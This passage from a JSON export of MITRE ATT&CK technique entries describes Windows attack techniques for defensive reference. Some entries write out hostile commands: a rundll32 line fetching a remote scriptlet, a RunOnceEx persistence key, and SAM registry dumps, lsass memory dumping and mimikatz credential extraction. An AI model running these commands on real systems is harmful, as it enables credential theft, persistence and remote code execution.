API level instead of calling other programs. 
Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.\n\nScripts can be embedded inside Office documents as macros that can be set to execute when files used in [Spearphishing Attachment](https:\/\/attack.mitre.org\/techniques\/T1193) and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through [Exploitation for Client Execution](https:\/\/attack.mitre.org\/techniques\/T1203), where adversaries will rely on macros being allowed or that the user will accept to activate them.\n\nMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. (Citation: Metasploit) (Citation: Metasploit), (Citation: Veil) (Citation: Veil), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. 
(Citation: Alperovitch 2014)","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"7fd87010-3a00-4da3-b905-410525e8ec44","tag_id":"729","meta":{"external_id":["T1064"],"kill_chain":["mitre-attack:defense-evasion","mitre-attack:execution"],"mitre_data_sources":["Process monitoring","File monitoring","Process command-line parameters"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1064","http:\/\/www.metasploit.com","https:\/\/www.veil-framework.com\/framework\/","https:\/\/github.com\/mattifestation\/PowerSploit","https:\/\/blog.crowdstrike.com\/deep-thought-chinese-targeting-national-security-think-tanks\/","https:\/\/www.uperesia.com\/analyzing-malicious-office-documents"]},"local":false},{"id":"1263","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Hooking - T1179","tag_name":"misp-galaxy:mitre-attack-pattern=\"Hooking - T1179\"","description":"Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. \n\nHooking involves redirecting calls to these functions and can be implemented via:\n\n* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs. (Citation: Microsoft Hook Overview) (Citation: Endgame Process Injection July 2017)\n* **Import address table (IAT) hooking**, which use modifications to a process\u2019s IAT, where pointers to imported API functions are stored. (Citation: Endgame Process Injection July 2017) (Citation: Adlice Software IAT Hooks Oct 2014) (Citation: MWRInfoSecurity Dynamic Hooking 2015)\n* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow. 
(Citation: Endgame Process Injection July 2017) (Citation: HighTech Bridge Inline Hooking Sept 2011) (Citation: MWRInfoSecurity Dynamic Hooking 2015)\n\nSimilar to [Process Injection](https:\/\/attack.mitre.org\/techniques\/T1055), adversaries may use hooking to load and execute malicious code within the context of another process, masking the execution while also allowing access to the process's memory and possibly elevated privileges. Installing hooking mechanisms may also provide Persistence via continuous invocation when the functions are called through normal use.\n\nMalicious hooking mechanisms may also capture API calls that include parameters that reveal user authentication credentials for Credential Access. (Citation: Microsoft TrojanSpy:Win32\/Ursnif.gen!I Sept 2017)\n\nHooking is commonly utilized by [Rootkit](https:\/\/attack.mitre.org\/techniques\/T1014)s to conceal files, processes, Registry keys, and other objects in order to hide malware and associated behaviors. (Citation: Symantec Windows Rootkits)","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"66f73398-8394-4711-85e5-34c8540b22a5","tag_id":"733","meta":{"external_id":["T1179"],"kill_chain":["mitre-attack:persistence","mitre-attack:privilege-escalation","mitre-attack:credential-access"],"mitre_data_sources":["API monitoring","Binary file metadata","DLL monitoring","Loaded DLLs","Process monitoring","Windows event 
logs"],"mitre_platforms":["Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1179","https:\/\/msdn.microsoft.com\/library\/windows\/desktop\/ms644959.aspx","https:\/\/www.endgame.com\/blog\/technical-blog\/ten-process-injection-techniques-technical-survey-common-and-trending-process","https:\/\/www.adlice.com\/userland-rootkits-part-1-iat-hooks\/","https:\/\/www.mwrinfosecurity.com\/our-thinking\/dynamic-hooking-techniques-user-mode\/","https:\/\/www.exploit-db.com\/docs\/17802.pdf","https:\/\/www.symantec.com\/avcenter\/reference\/windows.rootkit.overview.pdf","https:\/\/volatility-labs.blogspot.com\/2012\/09\/movp-31-detecting-malware-hooks-in.html","https:\/\/github.com\/prekageo\/winhook","https:\/\/github.com\/jay\/gethooks","https:\/\/zairon.wordpress.com\/2006\/12\/06\/any-application-defined-hook-procedure-on-my-machine\/","https:\/\/eyeofrablog.wordpress.com\/2017\/06\/27\/windows-keylogger-part-2-defense-against-user-land\/","http:\/\/www.gmer.net\/","https:\/\/msdn.microsoft.com\/library\/windows\/desktop\/ms686701.aspx","https:\/\/security.stackexchange.com\/questions\/17904\/what-are-the-methods-to-find-hooked-functions-and-apis"]},"local":false},{"id":"796","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Registry Run Keys \/ Startup Folder - T1060","tag_name":"misp-galaxy:mitre-attack-pattern=\"Registry Run Keys \/ Startup Folder - T1060\"","description":"Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. 
(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nThe following run keys are created by default on Windows systems:\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run<\/code>\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce<\/code>\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run<\/code>\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce<\/code>\n\nThe HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx<\/code> is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a \"Depend\" key with RunOnceEx: reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend \/v 1 \/d \"C:\\temp\\evil[.]dll\"<\/code> (Citation: Oddvar Moe RunOnceEx Mar 2018)\n\nThe following Registry keys can be used to set startup folder items for persistence:\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders<\/code>\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders<\/code>\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders<\/code>\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders<\/code>\n\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. 
Adversaries may also use [Masquerading](https:\/\/attack.mitre.org\/techniques\/T1036) to make the Registry entries look as if they are associated with legitimate programs.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"9422fc14-1c43-410d-ab0f-a709b76c72dc","tag_id":"767","meta":{"external_id":["CAPEC-270"],"kill_chain":["mitre-attack:persistence"],"mitre_data_sources":["Windows Registry","File monitoring"],"mitre_platforms":["Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1060","https:\/\/capec.mitre.org\/data\/definitions\/270.html","http:\/\/msdn.microsoft.com\/en-us\/library\/aa376977","https:\/\/support.microsoft.com\/help\/310593\/description-of-the-runonceex-registry-key","https:\/\/oddvar.moe\/2018\/03\/21\/persistence-using-runonceex-hidden-from-autoruns-exe\/","https:\/\/technet.microsoft.com\/en-us\/sysinternals\/bb963902"]},"local":false},{"id":"917","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Bypass User Account Control - T1088","tag_name":"misp-galaxy:mitre-attack-pattern=\"Bypass User Account Control - T1088\"","description":"Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)\n\nIf the UAC protection level of a computer is set to anything but the highest level, certain Windows programs are allowed to elevate privileges or execute some elevated COM objects without prompting the user through the UAC notification box. 
(Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of rundll32.exe to load a specifically crafted DLL which loads an auto-elevated COM object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user. (Citation: Davidson Windows) Adversaries can use these techniques to elevate privileges to administrator if the target process is unprotected.\n\nMany methods have been discovered to bypass UAC. The Github readme page for UACMe contains an extensive list of methods (Citation: Github UACMe) that have been discovered and implemented within UACMe, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:\n\n* eventvwr.exe<\/code> can auto-elevate and execute a specified binary or script. (Citation: enigma0x3 Fileless UAC Bypass) (Citation: Fortinet Fareit)\n\nAnother bypass is possible through some Lateral Movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on lateral systems and default to high integrity. 
(Citation: SANS UAC Bypass)","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be","tag_id":"731","meta":{"external_id":["T1088"],"kill_chain":["mitre-attack:defense-evasion","mitre-attack:privilege-escalation"],"mitre_data_sources":["System calls","Process monitoring","Authentication logs","Process command-line parameters"],"mitre_platforms":["Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1088","http:\/\/www.pretentiousname.com\/misc\/win7_uac_whitelist2.html","https:\/\/technet.microsoft.com\/en-us\/itpro\/windows\/keep-secure\/how-user-account-control-works","http:\/\/pen-testing.sans.org\/blog\/pen-testing\/2013\/08\/08\/psexec-uac-bypass","https:\/\/technet.microsoft.com\/en-US\/magazine\/2009.07.uac.aspx","https:\/\/msdn.microsoft.com\/en-us\/library\/ms679687.aspx","https:\/\/github.com\/hfiref0x\/UACME","https:\/\/enigma0x3.net\/2016\/08\/15\/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking\/","https:\/\/blog.fortinet.com\/2016\/12\/16\/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware","https:\/\/enigma0x3.net\/2017\/03\/14\/bypassing-uac-using-app-paths\/","https:\/\/enigma0x3.net\/2017\/03\/17\/fileless-uac-bypass-using-sdclt-exe\/"]},"local":false},{"id":"916","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Exploitation for Privilege Escalation - T1068","tag_name":"misp-galaxy:mitre-attack-pattern=\"Exploitation for Privilege Escalation - T1068\"","description":"Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. 
Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform Privilege Escalation to include use of software exploitation to circumvent those restrictions.\n\nWhen initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This may be a necessary step for an adversary compromising a endpoint system that has been properly configured and limits other privilege escalation methods.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"b21c3b2d-02e6-45b1-980b-e69051040839","tag_id":"768","meta":{"external_id":["CAPEC-69"],"kill_chain":["mitre-attack:privilege-escalation"],"mitre_data_sources":["Windows Error Reporting","Process monitoring","Application logs"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1068","https:\/\/capec.mitre.org\/data\/definitions\/69.html"]},"local":false},{"id":"1023","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Disabling Security Tools - T1089","tag_name":"misp-galaxy:mitre-attack-pattern=\"Disabling Security Tools - T1089\"","description":"Adversaries may disable security tools to avoid possible detection of their tools and activities. 
This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"2e0dd10b-676d-4964-acd0-8a404c92b044","tag_id":"769","meta":{"external_id":["CAPEC-578"],"kill_chain":["mitre-attack:defense-evasion"],"mitre_data_sources":["API monitoring","File monitoring","Services","Windows Registry","Process command-line parameters","Anti-virus"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1089","https:\/\/capec.mitre.org\/data\/definitions\/578.html"]},"local":false},{"id":"918","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Exploitation for Defense Evasion - T1211","tag_name":"misp-galaxy:mitre-attack-pattern=\"Exploitation for Defense Evasion - T1211\"","description":"Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code.\u00a0Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.\n\nAdversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for [Security Software Discovery](https:\/\/attack.mitre.org\/techniques\/T1063). The security software will likely be targeted directly for exploitation. 
There are examples of antivirus software being targeted by persistent threat groups to avoid detection.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"fe926152-f431-4baf-956c-4ad3cb0bf23b","tag_id":"770","meta":{"external_id":["T1211"],"kill_chain":["mitre-attack:defense-evasion"],"mitre_data_sources":["Windows Error Reporting","Process monitoring","File monitoring"],"mitre_platforms":["Linux","Windows","macOS"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1211"]},"local":false},{"id":"902","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Obfuscated Files or Information - T1027","tag_name":"misp-galaxy:mitre-attack-pattern=\"Obfuscated Files or Information - T1027\"","description":"Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.\n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate\/Decode Files or Information](https:\/\/attack.mitre.org\/techniques\/T1140) for [User Execution](https:\/\/attack.mitre.org\/techniques\/T1204). The user may also be required to input a password to open a password protected compressed\/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as Javascript.\n\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. 
(Citation: Linux\/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)\n\nAdversaries may also obfuscate commands executed from payloads or directly via a [Command-Line Interface](https:\/\/attack.mitre.org\/techniques\/T1059). Environment variables, aliases, characters, and other platform\/language specific semantics can be used to evade signature based detections and whitelisting mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: PaloAlto EncodedCommand March 2017)\n\nAnother example of obfuscation is through the use of steganography, a technique of hiding messages or code in images, audio tracks, video clips, or text files. One of the first known and reported adversaries that used steganography activity surrounding [Invoke-PSImage](https:\/\/attack.mitre.org\/software\/S0231). The Duqu malware encrypted the gathered information from a victim's system and hid it into an image followed by exfiltrating the image to a C2 server. (Citation: Wikipedia Duqu) By the end of 2017, an adversary group used [Invoke-PSImage](https:\/\/attack.mitre.org\/software\/S0231) to hide PowerShell commands in an image file (png) and execute the code on a victim's system. In this particular case the PowerShell code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary. 
(Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"b3d682b6-98f2-4fb0-aa3b-b4df007ca70a","tag_id":"771","meta":{"external_id":["T1027"],"kill_chain":["mitre-attack:defense-evasion"],"mitre_data_sources":["Network protocol analysis","Process use of network","File monitoring","Malware reverse engineering","Binary file metadata","Process command-line parameters","Environment variable","Process monitoring","Windows event logs","Network intrusion detection system","Email gateway","SSL\/TLS inspection"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1027","https:\/\/www.volexity.com\/blog\/2016\/11\/09\/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos\/","https:\/\/www.welivesecurity.com\/2013\/04\/26\/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole\/","https:\/\/www.carbonblack.com\/2016\/09\/23\/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks\/","https:\/\/www.fireeye.com\/blog\/threat-research\/2017\/06\/obfuscation-in-the-wild.html","https:\/\/www.fireeye.com\/content\/dam\/fireeye-www\/blog\/pdfs\/revoke-obfuscation-report.pdf","https:\/\/researchcenter.paloaltonetworks.com\/2017\/03\/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks\/","https:\/\/en.wikipedia.org\/wiki\/Duqu","https:\/\/securingtomorrow.mcafee.com\/mcafee-labs\/malicious-document-targets-pyeongchang-olympics\/","https:\/\/github.com\/danielbohannon\/Revoke-Obfuscation","https:\/\/github.com\/itsreallynick\/office-crackros"]},"local":false},{"id":"1243","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Rundll32 - T1085","tag_name":"misp-galaxy:mitre-attack-pattern=\"Rundll32 - T1085\"","description":"The rundll32.exe program 
can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.\n\nRundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL<\/code> and Control_RunDLLAsUser<\/code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]\/\/www[.]example[.]com\/malicious.sct\")\"<\/code> This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"62b8c999-dcc0-4755-bd69-09442d9359f5","tag_id":"772","meta":{"external_id":["T1085"],"kill_chain":["mitre-attack:defense-evasion","mitre-attack:execution"],"mitre_data_sources":["File monitoring","Process monitoring","Process command-line parameters","Binary file metadata"],"mitre_platforms":["Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1085","https:\/\/www.trendmicro.de\/cloud-content\/us\/pdfs\/security-intelligence\/white-papers\/wp-cpl-malware.pdf","https:\/\/thisissecurity.stormshield.com\/2014\/08\/20\/poweliks-command-line-confusion\/"]},"local":false},{"id":"1252","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Regsvr32 - T1117","tag_name":"misp-galaxy:mitre-attack-pattern=\"Regsvr32 - T1117\"","description":"Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic 
link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries. (Citation: Microsoft Regsvr32)\n\nAdversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of whitelists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe is also a Microsoft signed binary.\n\nRegsvr32.exe can also be used to specifically bypass process whitelisting using functionality to load COM scriptlets to execute DLLs under user permissions. Since regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: SubTee Regsvr32 Whitelisting Bypass) This variation of the technique is often referred to as a \"Squiblydoo\" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)\n\nRegsvr32.exe can also be leveraged to register a COM Object used to establish Persistence via [Component Object Model Hijacking](https:\/\/attack.mitre.org\/techniques\/T1122). 
(Citation: Carbon Black Squiblydoo Apr 2016)","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"68f7e3a1-f09f-4164-9a62-16b648a0dd5a","tag_id":"773","meta":{"external_id":["T1117"],"kill_chain":["mitre-attack:defense-evasion","mitre-attack:execution"],"mitre_data_sources":["Loaded DLLs","Process monitoring","Windows Registry","Process command-line parameters"],"mitre_platforms":["Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1117","https:\/\/support.microsoft.com\/en-us\/kb\/249873","https:\/\/web.archive.org\/web\/20161128183535\/https:\/\/subt0x10.blogspot.com\/2016\/04\/bypass-application-whitelisting-script.html","https:\/\/www.carbonblack.com\/2016\/04\/28\/threat-advisory-squiblydoo-continues-trend-of-attackers-using-native-os-tools-to-live-off-the-land\/","https:\/\/www.fireeye.com\/blog\/threat-research\/2017\/02\/spear_phishing_techn.html"]},"local":false},{"id":"1130","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Credential Dumping - T1003","tag_name":"misp-galaxy:mitre-attack-pattern=\"Credential Dumping - T1003\"","description":"Credential dumping is the process of obtaining account login and password information, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform\u00a0Lateral Movement\u00a0and access restricted information.\n\nSeveral of the tools mentioned in this technique may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.\n\n### Windows\n\n#### SAM (Security Accounts Manager)\n\nThe SAM is a database file that contains local accounts for the host, typically those found with the \u2018net user\u2019 command. 
To enumerate the SAM database, system level access is required.\n\u00a0\nA number of tools can be used to retrieve the SAM file through in-memory techniques:\n\n* pwdumpx.exe \n* [gsecdump](https:\/\/attack.mitre.org\/software\/S0008)\n* [Mimikatz](https:\/\/attack.mitre.org\/software\/S0002)\n* secretsdump.py\n\nAlternatively, the SAM can be extracted from the Registry with [Reg](https:\/\/attack.mitre.org\/software\/S0075):\n\n* reg save HKLM\\sam sam<\/code>\n* reg save HKLM\\system system<\/code>\n\nCreddump7 can then be used to process the SAM database locally to retrieve hashes. (Citation: GitHub Creddump7)\n\nNotes:\nRid 500 account is the local, in-built administrator.\nRid 501 is the guest account.\nUser accounts start with a RID of 1,000+.\n\n#### Cached Credentials\n\nThe DCC2 (Domain Cached Credentials version 2) hash, used by Windows Vista and newer caches credentials when the domain controller is unavailable. The number of default cached credentials varies, and this number can be altered per system. This hash does not allow pass-the-hash style attacks.\n\u00a0\nA number of tools can be used to retrieve the SAM file through in-memory techniques.\n\n* pwdumpx.exe \n* [gsecdump](https:\/\/attack.mitre.org\/software\/S0008)\n* [Mimikatz](https:\/\/attack.mitre.org\/software\/S0002)\n\nAlternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.\n\nNotes:\nCached credentials for Windows Vista are derived using PBKDF2.\n\n#### Local Security Authority (LSA) Secrets\n\nWith SYSTEM access to a host, the LSA secrets often allows trivial access from a local account to domain-based account credentials. The Registry is used to store the LSA secrets.\n\u00a0\nWhen services are run under the context of local or domain users, their passwords are stored in the Registry. 
If auto-logon is enabled, this information will be stored in the Registry as well.\n\u00a0\nA number of tools can be used to retrieve the SAM file through in-memory techniques.\n\n* pwdumpx.exe \n* [gsecdump](https:\/\/attack.mitre.org\/software\/S0008)\n* [Mimikatz](https:\/\/attack.mitre.org\/software\/S0002)\n* secretsdump.py\n\nAlternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.\n\nNotes:\nThe passwords extracted by his mechanism are\u00a0UTF-16\u00a0encoded, which means that they are returned in\u00a0plaintext.\nWindows 10 adds protections for LSA Secrets described in Mitigation.\n\n#### NTDS from Domain Controller\n\nActive Directory stores information about members of the domain including devices and users to verify credentials and define access rights. The Active Directory domain database is stored in the NTDS.dit file. By default the NTDS file will be located in %SystemRoot%\\NTDS\\Ntds.dit of a domain controller. (Citation: Wikipedia Active Directory)\n \nThe following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.\n\n* Volume Shadow Copy\n* secretsdump.py\n* Using the in-built Windows tool, ntdsutil.exe\n* Invoke-NinjaCopy\n\n#### Group Policy Preference (GPP) Files\n\nGroup Policy Preferences (GPP) are tools that allowed administrators to create domain policies with embedded credentials. These policies, amongst other things, allow administrators to set local accounts.\n\nThese group policies are stored in SYSVOL on a domain controller, this means that any domain user can view the SYSVOL share and decrypt the password (the AES private key was leaked on-line. 
(Citation: Microsoft GPP Key) (Citation: SRD GPP)\n\nThe following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:\n\n* Metasploit\u2019s post exploitation module: \"post\/windows\/gather\/credentials\/gpp\"\n* Get-GPPPassword (Citation: Obscuresecurity Get-GPPPassword)\n* gpprefdecrypt.py\n\nNotes:\nOn the SYSVOL share, the following can be used to enumerate potential XML files.\ndir \/s * .xml\n\n#### Service Principal Names (SPNs)\n\nSee [Kerberoasting](https:\/\/attack.mitre.org\/techniques\/T1208).\n\n#### Plaintext Credentials\n\nAfter a user logs on to a system, a variety of credentials are generated and stored in the\u00a0Local Security Authority Subsystem Service\u00a0(LSASS) process in memory. These credentials can be harvested by a administrative user or SYSTEM.\n\nSSPI (Security Support Provider Interface) functions as a common interface to several Security Support Providers (SSPs):\u00a0A Security Support Provider is a\u00a0dynamic-link library\u00a0(DLL) that makes one or more security packages available to applications.\n\nThe following SSPs can be used to access credentials:\n\nMsv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.\nWdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges. (Citation: TechNet Blogs Credential Protection)\nKerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.\nCredSSP: \u00a0Provides SSO and\u00a0Network Level Authentication\u00a0for\u00a0Remote Desktop Services. 
(Citation: Microsoft CredSSP)\n\u00a0\nThe following tools can be used to enumerate credentials:\n\n* [Windows Credential Editor](https:\/\/attack.mitre.org\/software\/S0005)\n* [Mimikatz](https:\/\/attack.mitre.org\/software\/S0002)\n\nAs well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.\n\nFor example, on the target host use procdump:\n\n* procdump -ma lsass.exe lsass_dump<\/code>\n\nLocally, mimikatz can be run:\n\n* sekurlsa::Minidump\u00a0lsassdump.dmp<\/code>\n* sekurlsa::logonPasswords<\/code>\n\n#### DCSync\n\nDCSync is a variation on credential dumping which can be used to acquire sensitive information from a domain controller. Rather than executing recognizable malicious code, the action works by abusing the domain controller's application programming interface (API) (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller. Any members of the Administrators, Domain Admins, Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data (Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a Golden Ticket for use in [Pass the Ticket](https:\/\/attack.mitre.org\/techniques\/T1097) (Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https:\/\/attack.mitre.org\/techniques\/T1098). (Citation: InsiderThreat ChangeNTLM July 2017) DCSync functionality has been included in the \"lsadump\" module in Mimikatz. (Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol. 
(Citation: Microsoft NRPC Dec 2017)\n\n### Linux\n\n#### Proc filesystem\n\nThe \/proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively. This functionality has been implemented in the [MimiPenguin](https:\/\/attack.mitre.org\/software\/S0179), an open source tool inspired by [Mimikatz](https:\/\/attack.mitre.org\/software\/S0002). The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22","tag_id":"734","meta":{"external_id":["CAPEC-567"],"kill_chain":["mitre-attack:credential-access"],"mitre_data_sources":["API monitoring","Process monitoring","PowerShell logs","Process command-line 
